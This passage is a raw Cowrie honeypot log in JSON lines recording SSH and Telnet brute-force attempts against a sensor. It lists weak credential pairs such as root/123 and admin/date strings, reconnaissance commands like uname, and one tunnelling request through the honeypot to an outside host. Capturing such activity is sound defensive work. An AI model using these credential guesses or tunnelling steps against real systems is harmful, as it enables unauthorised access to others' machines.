{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:24:52.443774Z","src_ip":"212.227.125.160","session":"a290bea73f4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46576,"dst_ip":"1.2.3.4","dst_port":22,"session":"08be5cff439c","protocol":"ssh","message":"New connection: 212.227.125.160:46576 (1.2.3.4:22) [session: 08be5cff439c]","sensor":"my-vps","timestamp":"2025-08-28T17:25:24.300618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:25:24.301277Z","src_ip":"212.227.125.160","session":"08be5cff439c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:25:24.351082Z","src_ip":"212.227.125.160","session":"08be5cff439c"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:25:24.503353Z","src_ip":"212.227.125.160","session":"08be5cff439c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:25:24.618567Z","src_ip":"212.227.125.160","session":"08be5cff439c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:25:24.619440Z","src_ip":"212.227.125.160","session":"08be5cff439c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:25:24.670886Z","src_ip":"212.227.125.160","session":"08be5cff439c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:25:24.672145Z","src_ip":"212.227.125.160","session":"08be5cff439c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51858,"dst_ip":"1.2.3.4","dst_port":23,"session":"16754cdeab72","protocol":"telnet","message":"New connection: 212.227.235.229:51858 (1.2.3.4:23) [session: 16754cdeab72]","sensor":"my-vps","timestamp":"2025-08-28T17:27:29.840858Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:27:30.021477Z","src_ip":"212.227.235.229","session":"16754cdeab72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:27:30.042861Z","src_ip":"212.227.235.229","session":"16754cdeab72"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T17:27:30.044390Z","src_ip":"212.227.235.229","session":"16754cdeab72"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T17:27:30.045252Z","src_ip":"212.227.235.229","session":"16754cdeab72"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56860,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bb4f7847a76","protocol":"ssh","message":"New connection: 217.72.205.35:56860 (1.2.3.4:22) [session: 5bb4f7847a76]","sensor":"my-vps","timestamp":"2025-08-28T17:27:38.554161Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:27:38.555281Z","src_ip":"217.72.205.35","session":"5bb4f7847a76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45039,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b490a6815da","protocol":"ssh","message":"New connection: 212.227.235.229:45039 (1.2.3.4:22) [session: 8b490a6815da]","sensor":"my-vps","timestamp":"2025-08-28T17:27:55.500595Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:27:55.501782Z","src_ip":"212.227.235.229","session":"8b490a6815da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45423,"dst_ip":"1.2.3.4","dst_port":22,"session":"329f66b41937","protocol":"ssh","message":"New connection: 212.227.235.229:45423 (1.2.3.4:22) [session: 329f66b41937]","sensor":"my-vps","timestamp":"2025-08-28T17:27:55.596514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:27:55.597576Z","src_ip":"212.227.235.229","session":"329f66b41937"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T17:27:55.726150Z","src_ip":"212.227.235.229","session":"329f66b41937"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:27:56.117972Z","src_ip":"212.227.235.229","session":"329f66b41937"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T17:27:56.247498Z","session":"329f66b41937"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:29:05.595773Z","src_ip":"212.227.235.229","session":"329f66b41937"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34594,"dst_ip":"1.2.3.4","dst_port":22,"session":"be270f591f1c","protocol":"ssh","message":"New connection: 212.227.235.229:34594 (1.2.3.4:22) [session: be270f591f1c]","sensor":"my-vps","timestamp":"2025-08-28T17:29:14.915028Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:29:15.165576Z","src_ip":"212.227.235.229","session":"be270f591f1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39018,"dst_ip":"1.2.3.4","dst_port":22,"session":"16444adcb765","protocol":"ssh","message":"New connection: 212.227.235.229:39018 (1.2.3.4:22) [session: 16444adcb765]","sensor":"my-vps","timestamp":"2025-08-28T17:29:25.422528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:29:25.423583Z","src_ip":"212.227.235.229","session":"16444adcb765"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:29:25.678459Z","src_ip":"212.227.235.229","session":"16444adcb765"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:29:26.460018Z","src_ip":"212.227.235.229","session":"16444adcb765"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:29:28.292304Z","src_ip":"212.227.235.229","session":"16444adcb765"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39048,"dst_ip":"1.2.3.4","dst_port":22,"session":"62a4faf51ca1","protocol":"ssh","message":"New connection: 212.227.235.229:39048 (1.2.3.4:22) [session: 62a4faf51ca1]","sensor":"my-vps","timestamp":"2025-08-28T17:29:32.966455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:29:32.967075Z","src_ip":"212.227.235.229","session":"62a4faf51ca1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:29:33.983114Z","src_ip":"212.227.235.229","session":"62a4faf51ca1"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T17:29:34.746756Z","src_ip":"212.227.235.229","session":"62a4faf51ca1"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:29:36.001337Z","src_ip":"212.227.235.229","session":"62a4faf51ca1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37642,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a3b93efa8fe","protocol":"ssh","message":"New connection: 212.227.235.229:37642 (1.2.3.4:22) [session: 5a3b93efa8fe]","sensor":"my-vps","timestamp":"2025-08-28T17:29:40.319685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:29:40.320949Z","src_ip":"212.227.235.229","session":"5a3b93efa8fe"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:29:40.426210Z","src_ip":"212.227.235.229","session":"5a3b93efa8fe"}
{"eventid":"cowrie.login.failed","username":"validator","password":"validator","message":"login attempt [validator/validator] failed","sensor":"my-vps","timestamp":"2025-08-28T17:29:40.743775Z","src_ip":"212.227.235.229","session":"5a3b93efa8fe"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:29:41.848845Z","src_ip":"212.227.235.229","session":"5a3b93efa8fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36756,"dst_ip":"1.2.3.4","dst_port":22,"session":"971b8e5d187c","protocol":"ssh","message":"New connection: 212.227.235.229:36756 (1.2.3.4:22) [session: 971b8e5d187c]","sensor":"my-vps","timestamp":"2025-08-28T17:29:44.274314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:29:44.275242Z","src_ip":"212.227.235.229","session":"971b8e5d187c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:29:44.528268Z","src_ip":"212.227.235.229","session":"971b8e5d187c"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:29:45.290285Z","src_ip":"212.227.235.229","session":"971b8e5d187c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:29:46.247045Z","src_ip":"212.227.235.229","session":"971b8e5d187c"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-28T17:29:46.247777Z","src_ip":"212.227.235.229","session":"971b8e5d187c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:29:46.500840Z","src_ip":"212.227.235.229","session":"971b8e5d187c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:29:46.502097Z","src_ip":"212.227.235.229","session":"971b8e5d187c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:30:30.078696Z","src_ip":"212.227.235.229","session":"16754cdeab72"}
{"eventid":"cowrie.session.closed","duration":180.24158668518066,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:30:30.082345Z","src_ip":"212.227.235.229","session":"16754cdeab72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39196,"dst_ip":"1.2.3.4","dst_port":22,"session":"f29b87d27738","protocol":"ssh","message":"New connection: 212.227.125.160:39196 (1.2.3.4:22) [session: f29b87d27738]","sensor":"my-vps","timestamp":"2025-08-28T17:30:44.806936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:30:44.808115Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:30:44.867617Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29051980","message":"login attempt [admin/29051980] failed","sensor":"my-vps","timestamp":"2025-08-28T17:30:45.190107Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29041991","message":"login attempt [admin/29041991] failed","sensor":"my-vps","timestamp":"2025-08-28T17:30:46.252275Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29031995","message":"login attempt [admin/29031995] failed","sensor":"my-vps","timestamp":"2025-08-28T17:30:47.315163Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28101987","message":"login attempt [admin/28101987] failed","sensor":"my-vps","timestamp":"2025-08-28T17:30:48.378119Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28061992","message":"login attempt [admin/28061992] failed","sensor":"my-vps","timestamp":"2025-08-28T17:30:49.440721Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:30:50.503028Z","src_ip":"212.227.125.160","session":"f29b87d27738"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52974,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e30b4877852","protocol":"telnet","message":"New connection: 212.227.235.229:52974 (1.2.3.4:23) [session: 1e30b4877852]","sensor":"my-vps","timestamp":"2025-08-28T17:32:29.330968Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:32:29.518239Z","src_ip":"212.227.235.229","session":"1e30b4877852"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:32:29.537335Z","src_ip":"212.227.235.229","session":"1e30b4877852"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T17:32:29.538923Z","src_ip":"212.227.235.229","session":"1e30b4877852"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T17:32:29.539757Z","src_ip":"212.227.235.229","session":"1e30b4877852"}
{"eventid":"cowrie.session.connect","src_ip":"185.204.169.17","src_port":36754,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcc4f737821b","protocol":"ssh","message":"New connection: 185.204.169.17:36754 (1.2.3.4:22) [session: dcc4f737821b]","sensor":"my-vps","timestamp":"2025-08-28T17:33:08.179759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:33:08.180750Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-s